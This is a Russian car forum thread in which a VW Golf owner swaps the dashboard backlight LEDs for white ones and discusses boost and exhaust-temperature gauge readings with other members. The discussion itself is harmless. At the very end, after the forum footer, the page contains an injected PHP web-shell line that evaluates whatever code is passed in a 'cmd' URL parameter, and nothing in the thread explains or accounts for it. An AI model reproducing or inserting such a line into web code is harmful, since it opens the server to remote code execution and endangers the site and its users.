+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 47

Тема: Изменение подсветки приборной панели


  1. #1
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    Купив датчики наддува и температуры выхлопных газов понял что хочу поменять цвет приборной панели на белый.. Прочитал как это делается на форуме правда наша приборка немного другая но отлечается совсем не сильно вот ссылка
    Ссылка 1


    вот ссылка на немецкий форум
    НЕМЕЦКИЙ САЙТ


    купил я диоды вот такие ДИОДЫ

    ну и припоял их как в инструкции шкода клуба.

    Внимание диоды имеют полярность!!! не перепутайте а то не будут светиться(((

    Вот что получилось у меня... Еще думаю в какой цвет сделать часы, комп и климу... толи в красный толи в белый попробовать.. но я не уверен что белый получится

    пока все выглядит так


  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Вот что получилось у меня... Еще думаю в какой цвет сделать часы, комп и климу... толи в красный толи в белый попробовать.. но я не уверен что белый получится

    пока все выглядит так

    мну нравиться при любом раскладе все, что делают со своей машиной люди, на то их личное право, а когда еще это не выглядит "аморально", то вдвойне приятней.
    Главное, что не зеленая подсветка. Белая вполне сочетается и выглядит контрасней чем родная.
    Смотреть на то как сочетаются остальные красные кнопки по салону, нужно комплексной обзорной фотгой. В целом если не трудно, то важный момент если делать все остальное, то только все до единой кнопочки, иначе если ты скажешь, что вот сдесь одна-две неполучается, то это будет выглядет аляповато, т.е. на это нужно решиться всеми силами. Или не трогать, оставив одну часть локально белой и она не будет выбиваться из общего фона если остальное будет типа под стрелки в один красный тон.

    Как работают датчики, нравится ? Скока выставлены пределы ?
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    мну нравиться при любом раскладе все, что делают со своей машиной люди, на то их личное право, а когда еще это не выглядит "аморально", то вдвойне приятней.
    Главное, что не зеленая подсветка. Белая вполне сочетается и выглядит контрасней чем родная.
    Смотреть на то как сочетаются остальные красные кнопки по салону, нужно комплексной обзорной фотгой. В целом если не трудно, то важный момент если делать все остальное, то только все до единой кнопочки, иначе если ты скажешь, что вот сдесь одна-две неполучается, то это будет выглядет аляповато, т.е. на это нужно решиться всеми силами. Или не трогать, оставив одну часть локально белой и она не будет выбиваться из общего фона если остальное будет типа под стрелки в один красный тон.

    Как работают датчики, нравится ? Скока выставлены пределы ?
    доделовать обязательно буду все табло на приборке и на климе... попробую в белый если не получится то в красный.. думаю бедет сочетаться тк сейчас колхоз полный с синими табло :rolleyes:

    датчики работают нормально... турбина дует 0.8 0.9 при резком переключении пик 1.1 но на 1-2 сек :angry: не знаю в чем дело.. может перепускной шалит и нужно с пружинами в нем поколдавать :rolleyes:

    предел на турбине 1бар чтобы слышать когда дует 1 и выше
    предел на температуре выхлопных газов 900, но пока ни разу не доходило.. пиковое значение 850 и то очень редко... рабочая температура при быстрой езде 750-800

  4. #4
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    красиво.+1
    I love GTIclub

  5. #5
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    в итоге получилось так


  6. #6
    GTI-Racing zZz is on a distinguished road Аватар для zZz
    Регистрация
    22.07.2006
    Машина
    vw GolF 4
    Сообщений
    635
    в итоге получилось так
    получилось зачетно, приятный белый цвет!))

  7. #7
    Мимо проходил Вов@н is on a distinguished road Аватар для Вов@н
    Регистрация
    19.01.2008
    Сообщений
    11
    Тоже себе сваял такой "тюних". Аффтар, а как стрелки регулировал?

  8. #8
    GTI-Racing Malex is on a distinguished road Аватар для Malex
    Регистрация
    26.10.2006
    Машина
    MK5 e30
    Сообщений
    182
    Зачет знакомый на боре тоже переделывал только там где пробег красным подсветил

  9. #9
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    Тоже себе сваял такой "тюних". Аффтар, а как стрелки регулировал?
    против часовой стрелки крути до нижней отметки и усе

  10. #10
    отлично получилось!!!!

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Адаптация приборной панели 50 канал.
    от BVQ в разделе Электрика
    Ответов: 1
    Последнее сообщение: 30.03.2018, 22:53
  2. Ответов: 2
    Последнее сообщение: 20.03.2011, 00:04
  3. Ответов: 7
    Последнее сообщение: 01.12.2008, 12:52
  4. Изменение цвета панели приборов
    от RomanD84 в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 3
    Последнее сообщение: 27.03.2008, 01:50
  5. Интересная Мулька Подсветки Приборной Панели
    от в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}